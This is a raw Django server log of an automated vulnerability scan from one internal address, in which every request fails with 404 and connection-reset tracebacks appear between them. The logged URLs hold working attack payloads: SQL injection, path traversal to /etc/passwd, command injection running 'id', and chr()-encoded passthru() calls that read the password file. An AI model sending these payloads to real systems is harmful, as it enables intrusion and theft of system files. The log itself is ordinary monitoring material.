[07/Nov/2020 22:24:53] code 400, message Bad request syntax ("GET /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` HTTP/1.1")
[07/Nov/2020 22:24:53] "GET /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` HTTP/1.1" 400 -
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[07/Nov/2020 22:24:53] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2322
Not Found: /
[07/Nov/2020 22:24:54] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:24:55] "GET / HTTP/1.0" 404 2154
Not Found: /scripts/dbman/db.cgi
[07/Nov/2020 22:24:55] "GET /scripts/dbman/db.cgi?db=no-db HTTP/1.1" 404 2236
Not Found: /
[07/Nov/2020 22:24:55] "GET / HTTP/1.1" 404 2154
Not Found: /SSI/index.htm
[07/Nov/2020 22:24:56] "GET /SSI/index.htm HTTP/1.1" 404 2206
Not Found: /
[07/Nov/2020 22:24:56] "GET / HTTP/1.1" 404 2154
Not Found: /xsql/lib/XSQLConfig.xml
[07/Nov/2020 22:24:56] "GET /xsql/lib/XSQLConfig.xml HTTP/1.1" 404 2236
Not Found: /servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
[07/Nov/2020 22:24:57] "GET /servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml HTTP/1.1" 404 2344
Not Found: /cli
[07/Nov/2020 22:24:57] "POST /cli HTTP/1.1" 404 2182
Not Found: /cli
[07/Nov/2020 22:24:57] "POST /cli HTTP/1.1" 404 2182
Not Found: /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
[07/Nov/2020 22:24:57] "GET /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml HTTP/1.1" 404 2320
Not Found: /jars/upload
[07/Nov/2020 22:24:57] "POST /jars/upload HTTP/1.1" 404 2206
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:24:59] "GET /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2256
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:24:59] "GET /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2262
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:24:59] "GET /_async/AsyncResponseService HTTP/1.1" 404 2253
Not Found: /mediawiki/index.php/Main_Page
[07/Nov/2020 22:25:00] "GET /mediawiki/index.php/Main_Page HTTP/1.1" 404 2259
Not Found: /mediawiki/index.php
[07/Nov/2020 22:25:00] "GET /mediawiki/index.php?title=Special:Modifications_r%C3%A9centes&feed=atom HTTP/1.1" 404 2285
Not Found: /mediawiki/index.php/mw-config
[07/Nov/2020 22:25:00] "GET /mediawiki/index.php/mw-config HTTP/1.1" 404 2259
Not Found: /mediawiki/index.php/RELEASE-NOTES
[07/Nov/2020 22:25:00] "GET /mediawiki/index.php/RELEASE-NOTES HTTP/1.1" 404 2271
Not Found: /index.php/Main_Page
[07/Nov/2020 22:25:01] "GET /index.php/Main_Page HTTP/1.1" 404 2229
Not Found: /index.php
[07/Nov/2020 22:25:01] "GET /index.php?title=Special:Modifications_r%C3%A9centes&feed=atom HTTP/1.1" 404 2255
Not Found: /index.php/mw-config
[07/Nov/2020 22:25:01] "GET /index.php/mw-config HTTP/1.1" 404 2229
Not Found: /index.php/RELEASE-NOTES
[07/Nov/2020 22:25:01] "GET /index.php/RELEASE-NOTES HTTP/1.1" 404 2241
Not Found: /wiki/index.php/Main_Page
[07/Nov/2020 22:25:01] "GET /wiki/index.php/Main_Page HTTP/1.1" 404 2244
Not Found: /wiki/index.php
[07/Nov/2020 22:25:01] "GET /wiki/index.php?title=Special:Modifications_r%C3%A9centes&feed=atom HTTP/1.1" 404 2270
Not Found: /wiki/index.php/mw-config
[07/Nov/2020 22:25:01] "GET /wiki/index.php/mw-config HTTP/1.1" 404 2244
Not Found: /wiki/index.php/RELEASE-NOTES
[07/Nov/2020 22:25:01] "GET /wiki/index.php/RELEASE-NOTES HTTP/1.1" 404 2256
Not Found: /Wiki/index.php/Main_Page
[07/Nov/2020 22:25:01] "GET /Wiki/index.php/Main_Page HTTP/1.1" 404 2244
Not Found: /cgi-bin/bb-hostsvc.sh
[07/Nov/2020 22:25:02] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1" 404 2264
Not Found: /Wiki/index.php
[07/Nov/2020 22:25:02] "GET /Wiki/index.php?title=Special:Modifications_r%C3%A9centes&feed=atom HTTP/1.1" 404 2270
Not Found: /Wiki/index.php/mw-config
[07/Nov/2020 22:25:02] "GET /Wiki/index.php/mw-config HTTP/1.1" 404 2244
Not Found: /scripts/bb-hostsvc.sh
[07/Nov/2020 22:25:02] "GET /scripts/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1" 404 2264
Not Found: /Wiki/index.php/RELEASE-NOTES
[07/Nov/2020 22:25:02] "GET /Wiki/index.php/RELEASE-NOTES HTTP/1.1" 404 2256
Not Found: /
[07/Nov/2020 22:25:02] "GET / HTTP/1.1" 404 2154
Not Found: /app/kibana
[07/Nov/2020 22:25:03] "GET /app/kibana HTTP/1.1" 404 2202
Not Found: /
[07/Nov/2020 22:25:04] "GET / HTTP/1.1" 404 2154
Not Found: /webpagetest/
[07/Nov/2020 22:25:04] "GET /webpagetest/ HTTP/1.1" 404 2208
Not Found: /webpagetest/www/
[07/Nov/2020 22:25:04] "GET /webpagetest/www/ HTTP/1.1" 404 2220
Not Found: /uilogonsubmit.jsp
[07/Nov/2020 22:25:04] "POST /uilogonsubmit.jsp HTTP/1.1" 404 2224
Not Found: /ans.pl
[07/Nov/2020 22:25:06] "GET /ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 404 2225
Not Found: /ans/ans.pl
[07/Nov/2020 22:25:06] "GET /ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 404 2237
Not Found: /
[07/Nov/2020 22:25:06] "GET / HTTP/1.1" 404 2149
Not Found: /cgi-bin/ans.pl
[07/Nov/2020 22:25:06] "GET /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 404 2249
Not Found: /cgi-bin/ans/ans.pl
[07/Nov/2020 22:25:06] "GET /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 404 2261
Not Found: /scripts/ans.pl
[07/Nov/2020 22:25:06] "GET /scripts/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 404 2249
Not Found: /scripts/ans/ans.pl
[07/Nov/2020 22:25:07] "GET /scripts/ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 404 2261
Not Found: /
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/wsgiref/handlers.py", line 183, in finish_response
    self.close()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 113, in close
    self.get_stdin()._read_limited()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/handlers/wsgi.py", line 28, in _read_limited
    result = self.stream.read(size)
OverflowError: cannot fit 'int' into an index-sized integer
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 33318)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:25:08] "INDEX / HTTP/1.0" 404 2156
Not Found: /soap/servlet/soaprouter
[07/Nov/2020 22:25:08] "GET /soap/servlet/soaprouter HTTP/1.1" 404 2236
Not Found: /server-info
[07/Nov/2020 22:25:08] "GET /server-info HTTP/1.1" 404 2200
Not Found: /userLogin.asp
[07/Nov/2020 22:25:08] "GET /userLogin.asp HTTP/1.0" 404 2211
Not Found: /
[07/Nov/2020 22:25:13] "GET / HTTP/1.1" 404 2154
Not Found: /bigipgui/bigconf.cgi
[07/Nov/2020 22:25:13] "GET /bigipgui/bigconf.cgi?command=bigcommand&CommandType=bigpipe HTTP/1.0" 404 2275
Not Found: /DoLogin
[07/Nov/2020 22:25:13] "GET /DoLogin HTTP/1.1" 404 2193
Not Found: /RPC2_Login
[07/Nov/2020 22:25:13] "GET /RPC2_Login HTTP/1.1" 404 2202
Not Found: /LAPI/V1.0/Channel/0/System/Login
[07/Nov/2020 22:25:14] "GET /LAPI/V1.0/Channel/0/System/Login HTTP/1.1" 404 2268
Not Found: /doc/page/login.asp
[07/Nov/2020 22:25:14] "GET /doc/page/login.asp HTTP/1.1" 404 2226
Not Found: /assets/file:///etc/passwd
[07/Nov/2020 22:25:14] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 404 2247
Not Found: /assets/file:////c:/windows/win.ini
[07/Nov/2020 22:25:14] "GET /assets/file:%2f%2f//c:/windows/win.ini HTTP/1.1" 404 2274
Not Found: /noneCms/public/index.php/admin/login/index.html
[07/Nov/2020 22:25:17] "GET /noneCms/public/index.php/admin/login/index.html HTTP/1.1" 404 2313
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 41728)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /noneCms1.3/public/index.php/admin/login/index.html
[07/Nov/2020 22:25:17] "GET /noneCms1.3/public/index.php/admin/login/index.html HTTP/1.1" 404 2322
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 41734)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /public/index.php/admin/login/index.html
[07/Nov/2020 22:25:17] "GET /public/index.php/admin/login/index.html HTTP/1.1" 404 2289
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 41754)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /index.php/admin/login/index.html
[07/Nov/2020 22:25:17] "GET /index.php/admin/login/index.html HTTP/1.1" 404 2268
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 41804)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /phpBB2/viewtopic.php
[07/Nov/2020 22:25:18] "GET /phpBB2/viewtopic.php HTTP/1.0" 404 2227
Not Found: /index.htm
[07/Nov/2020 22:25:18] "GET /index.htm?PAGE=web HTTP/1.1" 404 2208
Not Found: /forum/viewtopic.php
[07/Nov/2020 22:25:19] "GET /forum/viewtopic.php HTTP/1.0" 404 2224
Not Found: /phpadmin/
[07/Nov/2020 22:25:19] "GET /phpadmin/ HTTP/1.1" 404 2199
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 42158)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:25:19] "GET / HTTP/1.1" 404 2154
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 42196)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /phpmyadmin/
[07/Nov/2020 22:25:19] "GET /phpmyadmin/ HTTP/1.1" 404 2205
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 42226)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /forums/viewtopic.php
[07/Nov/2020 22:25:19] "GET /forums/viewtopic.php HTTP/1.0" 404 2227
Not Found: /phpBB/viewtopic.php
[07/Nov/2020 22:25:19] "GET /phpBB/viewtopic.php HTTP/1.0" 404 2224
Not Found: /cgi-bin/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /cgi-bin/awstatstotals.php?sort=%7b%24%7bpassthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2426
Not Found: /cgi-bin/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /cgi-bin/awstatstotals.php?sort=%7b%24%7bpassthru(chr(100).chr(105).chr(114).chr(32).chr(47).chr(65).chr(58).chr(72).chr(32).chr(99).chr(58))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2389
Not Found: /awstatstotals.php
[07/Nov/2020 22:25:20] "GET /awstatstotals.php?sort=%7b%24%7bpassthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2402
Not Found: /awstatstotals.php
[07/Nov/2020 22:25:20] "GET /awstatstotals.php?sort=%7b%24%7bpassthru(chr(100).chr(105).chr(114).chr(32).chr(47).chr(65).chr(58).chr(72).chr(32).chr(99).chr(58))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2365
Not Found: /pages/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /pages/awstatstotals.php?sort=%7b%24%7bpassthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2420
Not Found: /pages/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /pages/awstatstotals.php?sort=%7b%24%7bpassthru(chr(100).chr(105).chr(114).chr(32).chr(47).chr(65).chr(58).chr(72).chr(32).chr(99).chr(58))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2383
Not Found: /viewtopic.php
[07/Nov/2020 22:25:20] "GET /viewtopic.php HTTP/1.0" 404 2206
Not Found: /apache2-default/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /apache2-default/awstatstotals.php?sort=%7b%24%7bpassthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2450
Not Found: /apache2-default/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /apache2-default/awstatstotals.php?sort=%7b%24%7bpassthru(chr(100).chr(105).chr(114).chr(32).chr(47).chr(65).chr(58).chr(72).chr(32).chr(99).chr(58))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2413
Not Found: /stat/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2417
Not Found: /stat/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru(chr(100).chr(105).chr(114).chr(32).chr(47).chr(65).chr(58).chr(72).chr(32).chr(99).chr(58))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2380
Not Found: /awstatstotals/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2444
Not Found: /phpbb/viewtopic.php
[07/Nov/2020 22:25:20] "GET /phpbb/viewtopic.php HTTP/1.0" 404 2224
Not Found: /awstatstotals/awstatstotals.php
[07/Nov/2020 22:25:20] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru(chr(100).chr(105).chr(114).chr(32).chr(47).chr(65).chr(58).chr(72).chr(32).chr(99).chr(58))%7d%7d%7b%24%7bexit()%7d%7d HTTP/1.1" 404 2407
Not Found: /bbs/viewtopic.php
[07/Nov/2020 22:25:21] "GET /bbs/viewtopic.php HTTP/1.0" 404 2218
Not Found: /theme/META-INF/
[07/Nov/2020 22:25:22] "GET /theme/META-INF/ HTTP/1.1" 404 2217
Not Found: /cgi-bin/swc
[07/Nov/2020 22:25:25] "GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1" 404 2705
Not Found: /scripts/swc
[07/Nov/2020 22:25:25] "GET /scripts/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1" 404 2705
Not Found: /RsasTest1791655417.html
[07/Nov/2020 22:25:26] "GET /RsasTest1791655417.html HTTP/1.1" 404 2236
Not Found: /cgi-bin/whois.cgi
[07/Nov/2020 22:25:26] "GET /cgi-bin/whois.cgi?action=load&whois=%3Bid HTTP/1.1" 404 2246
Not Found: /login
[07/Nov/2020 22:25:26] "GET /login HTTP/1.1" 404 2187
Not Found: /scripts/whois.cgi
[07/Nov/2020 22:25:27] "GET /scripts/whois.cgi?action=load&whois=%3Bid HTTP/1.1" 404 2246
Not Found: /api/v1/node
[07/Nov/2020 22:25:27] "GET /api/v1/node HTTP/1.1" 404 2205
Not Found: /
[07/Nov/2020 22:25:27] "POST /?upload HTTP/1.1" 404 2162
Not Found: /xoda/
[07/Nov/2020 22:25:27] "POST /xoda/?upload HTTP/1.1" 404 2195
Not Found: /xoda-0.4.0/
[07/Nov/2020 22:25:27] "POST /xoda-0.4.0/?upload HTTP/1.1" 404 2213
Not Found: /xoda-0.4.1/
[07/Nov/2020 22:25:28] "POST /xoda-0.4.1/?upload HTTP/1.1" 404 2213
Not Found: /xoda-0.4.2/
[07/Nov/2020 22:25:28] "POST /xoda-0.4.2/?upload HTTP/1.1" 404 2213
Not Found: /xoda-0.4.3/
[07/Nov/2020 22:25:28] "POST /xoda-0.4.3/?upload HTTP/1.1" 404 2213
Not Found: /xoda-0.4.4/
[07/Nov/2020 22:25:28] "POST /xoda-0.4.4/?upload HTTP/1.1" 404 2213
Not Found: /xoda-0.4.5/
[07/Nov/2020 22:25:28] "POST /xoda-0.4.5/?upload HTTP/1.1" 404 2213
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:25:29] "GET /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2256
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:25:29] "GET /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2262
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:25:30] "GET /_async/AsyncResponseService HTTP/1.1" 404 2253
Not Found: /test_kingler56965.html
[07/Nov/2020 22:25:30] "TRACE /test_kingler56965.html HTTP/1.1" 404 2240
Not Found: /cgi-bin/com5.pl
[07/Nov/2020 22:25:31] "GET /cgi-bin/com5.pl HTTP/1.1" 404 2212
Not Found: /xsql/demo/airport/airport.xsql
[07/Nov/2020 22:25:33] "GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.1" 404 2277
Not Found: /
[07/Nov/2020 22:25:33] "GET / HTTP/1.1" 404 2149
Not Found: /
[07/Nov/2020 22:25:33] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/kvm.cgi
[07/Nov/2020 22:25:36] "GET /cgi-bin/kvm.cgi?&file=login HTTP/1.1" 404 2233
Not Found: //bb_smilies.php
[07/Nov/2020 22:25:36] "GET //bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2278
Not Found: /phpBB/bb_smilies.php
[07/Nov/2020 22:25:36] "GET /phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2293
Not Found: /forum/bb_smilies.php
[07/Nov/2020 22:25:36] "GET /forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2293
Not Found: /phpbb/bb_smilies.php
[07/Nov/2020 22:25:37] "GET /phpbb/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2293
Not Found: /pages/bb_smilies.php
[07/Nov/2020 22:25:37] "GET /pages/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2293
Not Found: /cgi-bin/bb_smilies.php
[07/Nov/2020 22:25:38] "GET /cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2299
Not Found: /scripts/bb_smilies.php
